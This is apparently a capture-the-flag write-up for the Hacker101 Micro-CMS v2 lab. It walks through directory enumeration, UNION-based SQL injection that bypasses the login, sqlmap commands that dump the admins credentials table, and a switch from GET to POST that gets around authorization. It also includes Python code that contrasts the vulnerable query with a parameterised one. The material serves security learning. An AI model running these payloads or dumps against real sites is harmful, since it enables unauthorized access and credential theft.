What

A CMS with a Python backend, prone to SQL injection.

Micro-CMS v2 home

Difficulty: Moderate

Flag0

Hint0: Regular users can only see public pages

Start by wandering around the site, visiting every available page so that Burp's site map gets populated.

As we can see on the Changelog page (/page/1), user authentication has been implemented, so by default only admins can add or edit pages.

As a regular user (without authenticating via /login), we can load the following pages:

sitemap for regular user

  • /home
  • /login
  • /page/1
  • /page/2

Can't hurt to run gobuster and dirb too, right? Both find only /logout in addition to what we already had.

gobuster dir -u https://IAMSOSORRY.ctf.hacker101.com/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -z -t 100

gobuster

Let’s run dirb too.

dirb https://IAMSOSORRY.ctf.hacker101.com/

dirb

It made me a bit upset that dirb did not find anything under /page, so I quickly modified my wordlist-generator script (used in Postbook) to create an index list [1-100]. Running dirb with this wordlist on /page revealed /page/3, which is Forbidden.

dirb https://IAMSOSORRY.ctf.hacker101.com/page/ ~/scripts/numbers100.txt

dirb with wordlist

/page/3 forbidden

Hint1: Getting admin access might require a more perfect union

The hint tells us that the login page is vulnerable to SQL injection. Starting with a basic payload (') in the Username field produced an error message:

Traceback (most recent call last):
  File "./main.py", line 145, in do_login
    if cur.execute('SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')) == 0:
  File "/usr/local/lib/python2.7/site-packages/MySQLdb/cursors.py", line 255, in execute
    self.errorhandler(self, exc, value)
  File "/usr/local/lib/python2.7/site-packages/MySQLdb/connections.py", line 50, in defaulterrorhandler
    raise errorvalue
ProgrammingError: (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ';'' at line 1")

Leaving error reporting active on a live site, so that clients get full error details, is bad practice. For us it is a gift: the traceback shows the exact query and how it is built (the username is formatted straight into the SQL string with %, not passed as a bound parameter), and the error text tells us the backend is MariaDB, i.e. MySQL-compatible.

Here you can find a comprehensive list of payloads for MySQL databases.

Following the hint, we should focus on the Union Based section of that page. A few documents worth a look before continuing:

Let's determine how many columns the original query returns with:

' order by 1;
' order by 2;
' order by 3;

The first query results in an "Unknown user" message; the others end in error details. So the original query returns a single column.

If we try with

' union select null;
' union select null,null;
' union select null,null,null;

as the username, the first union query produces "Invalid password" while the others give us the error details again: a one-column UNION is accepted, and the NULL it returns is then compared against the password we typed.

Look at the traceback again. The query behind the scenes is

SELECT password FROM admins WHERE username='[username field]'

The password field is not part of the query at all: the application looks up the stored password for the given username and compares it afterwards, which is why a username matching no row gives "Unknown user" while a matching one gives "Invalid password". Everything after the username's opening ' is under our control, so our payload closes the string, appends a UNION of our own and comments out the application's closing quote:

SELECT password FROM admins WHERE username='[payload]

As the query returns a single column, we make the UNION return a fixed value as the password and then type that same value into the password field (no real username needed):

SELECT password FROM admins WHERE username='' UNION SELECT '123' AS password#'

Username: ' UNION SELECT '123' AS password# (uppercase is not required)

Password: 123

Here you can find a more detailed answer on why and how the query above works.

If you catch the request in Burp, you’ll see this:

username=%27+union+select+%27123%27+as+password%23&password=123

Fantastic, we’re in:

Logged in
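As an added example (not code from the challenge or from this writeup), here is the login check reconstructed from the traceback, run against an in-memory SQLite database that stands in for the MariaDB backend. The admins table contents, the assumption that the messages come from comparing the fetched row against the typed password, and the hardened variant are all mine; SQLite does not treat # as a comment, so the payloads end in "-- " where the # used above does the same job on MariaDB.

```python
"""Vulnerable login query from the traceback, next to a parameterised version."""
import sqlite3


def make_db():
    # Constructed sample data; the real admins table is not on the page.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admins VALUES ('admin', 'realpass')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-formatted query exactly as the traceback shows it.

    The replace('%', '%%') only doubles percent signs inside the user value;
    it does nothing against a single quote closing the string literal.
    """
    query = "SELECT password FROM admins WHERE username='%s'" % username.replace("%", "%%")
    try:
        rows = conn.execute(query).fetchall()   # MySQLdb returned a row count here
    except sqlite3.Error:
        return "error"                            # the live site leaked a traceback instead
    if not rows:
        return "unknown user"
    if rows[0][0] != password:                    # password compared in code, not in SQL
        return "invalid password"
    return "ok"


def login_fixed(conn, username, password):
    """Bound parameter plus one non-revealing failure message (assumed hardening)."""
    rows = conn.execute("SELECT password FROM admins WHERE username=?", (username,)).fetchall()
    if not rows or rows[0][0] != password:
        return "incorrect username and/or password"
    return "ok"


# Probes from the walkthrough; '-- ' replaces '#' because SQLite lacks '#' comments.
COLUMN_PROBES = [
    "' order by 1-- ",
    "' order by 2-- ",
    "' union select null-- ",
    "' union select null,null-- ",
]
UNION_BYPASS = "' union select '123' as password-- "

if __name__ == "__main__":
    db = make_db()
    for payload in ["'"] + COLUMN_PROBES + [UNION_BYPASS]:
        print(f"{payload!r:40} vulnerable={login_vulnerable(db, payload, '123')!r:20} "
              f"fixed={login_fixed(db, payload, '123')!r}")
```

Run it directly to see every probe side by side: the vulnerable path reproduces the "Unknown user" / error / "Invalid password" / logged-in sequence observed above, while the parameterised version treats each payload as an ordinary, non-matching username.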

Hint2: Knowing the password is cool, but there are other approaches that might be easier

After logging in, an additional link appears: /page/3, which was forbidden before.

Home after login

The page reveals the first FLAG.

FLAG

Alternatively, we can reveal this FLAG with sqlmap by dumping the pages table:

sqlmap -r ~/h101/micro-cms_v2/login.txt -D level2 -T pages --dump --random-agent --threads 10

sqlmap pages FLAG

See Flag2 for more details on sqlmap.

Flag1

Hint0: What actions could you perform as a regular user on the last level, which you can’t now?

On the previous level we were able to create and edit pages; on this level we have to log in first.

Hint1: Just because request fails with one method doesn’t mean it will fail with a different method

When it comes to changing the request method, our usual friends are Burp and cURL.

With Burp, we can intercept the request and replace GET with POST.

cURL's default request method is also GET; -X POST switches it to POST.

Hint2: Different requests often have different required authorization

Burp (intercept the request):

GET Burp

cURL:

GET cURL

Change the request method from GET to POST.

Burp:

POST Burp

Another FLAG.

FLAG

cURL:

POST cURL
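The numeric index list fed to dirb in Flag0 and the GET-versus-POST comparison of this level are two halves of the same check, so here is one added example (my own code, not from the writeup or the challenge) that builds the index list, requests each path with several methods and reports paths refused for one method but served for another. The target name, the status codes in the fixture and the helper names are constructed for illustration and say nothing about the real site; swap constructed_fetch for http_status to run it live, adding a session cookie where needed.

```python
"""Enumerate /page/<n> and compare how each path answers GET versus POST."""
import urllib.error
import urllib.request

REFUSED = {401, 403}   # authorization failures; 405 is just "method not supported"


def index_wordlist(lo, hi):
    """The [lo-hi] numeric list the text fed to dirb against /page/."""
    return [str(n) for n in range(lo, hi + 1)]


def http_status(url, method, cookie=None, timeout=10):
    """Live transport: status code of one request (4xx/5xx returned, not raised)."""
    req = urllib.request.Request(url, data=b"" if method == "POST" else None, method=method)
    if cookie:
        req.add_header("Cookie", cookie)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def method_matrix(base_url, paths, methods=("GET", "POST"), fetch=http_status):
    """Map (path, method) -> status. `fetch` is injectable so the logic runs offline."""
    base = base_url.rstrip("/")
    return {(p, m): fetch(base + p, m) for p in paths for m in methods}


def method_inconsistencies(matrix):
    """Paths refused (401/403) for one method yet answered 2xx/3xx for another:
    the "different requests, different authorization" case from the hint."""
    per_path = {}
    for (path, method), status in matrix.items():
        per_path.setdefault(path, {})[method] = status
    return {
        path: codes
        for path, codes in per_path.items()
        if any(c in REFUSED for c in codes.values())
        and any(200 <= c < 400 for c in codes.values())
    }


# Constructed fixture standing in for a target; purely illustrative status codes.
CONSTRUCTED_RESPONSES = {
    ("/page/1", "GET"): 200, ("/page/1", "POST"): 405,
    ("/page/2", "GET"): 200, ("/page/2", "POST"): 405,
    ("/page/3", "GET"): 403, ("/page/3", "POST"): 200,
    ("/page/4", "GET"): 404, ("/page/4", "POST"): 404,
}


def constructed_fetch(url, method):
    """Offline stand-in for http_status that answers from the fixture above."""
    path = "/" + url.split("/", 3)[3]   # drop scheme and host
    return CONSTRUCTED_RESPONSES.get((path, method), 404)


if __name__ == "__main__":
    paths = ["/page/" + n for n in index_wordlist(1, 4)]
    matrix = method_matrix("https://example.invalid", paths, fetch=constructed_fetch)
    for key, status in sorted(matrix.items()):
        print(key, status)
    print("worth a second look:", method_inconsistencies(matrix))
```

A 405 on POST is left out of the report on purpose: it means the route does not accept the method at all, whereas a 403 on one method next to a 200 on another is the kind of per-method authorization gap worth chasing with Burp or curl -X.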

Flag2

Hint0: Credentials are secret, flags are secret. Coincidence?

We already know that the login fields are vulnerable to injection, but an SQLi challenge wouldn't be complete without sqlmap; there is also much to learn from its output.

First, I saved the GET request with Burp Intercept as login.txt (username=user and password=pass).

save login request

Let's see how sqlmap lists the databases:

sqlmap -r ~/h101/micro-cms_v2/login.txt --dbs --random-agent --threads 10

sqlmap databases

We have the database name (level2); now get the tables with:

sqlmap -r ~/h101/micro-cms_v2/login.txt -D level2 --tables --random-agent --threads 10

sqlmap tables

Let's dump the admins table:

sqlmap -r ~/h101/micro-cms_v2/login.txt -D level2 -T admins --dump --random-agent --threads 10

sqlmap dump admins

Logging in with the credentials above reveals the third FLAG.

FLAG

Takeaway(s)

  • Return a single “Incorrect username and/or password” message instead of revealing which of the two fields was wrong
  • Build queries with bound parameters; formatting user input into the SQL string, as the traceback shows, is what made the injection possible
  • Never expose tracebacks or database error details to clients on a live site
  • Try changing the request method between GET and POST
  • Don’t rely on automated tools; understand what they are doing
  • Gain experience with different tools for the same task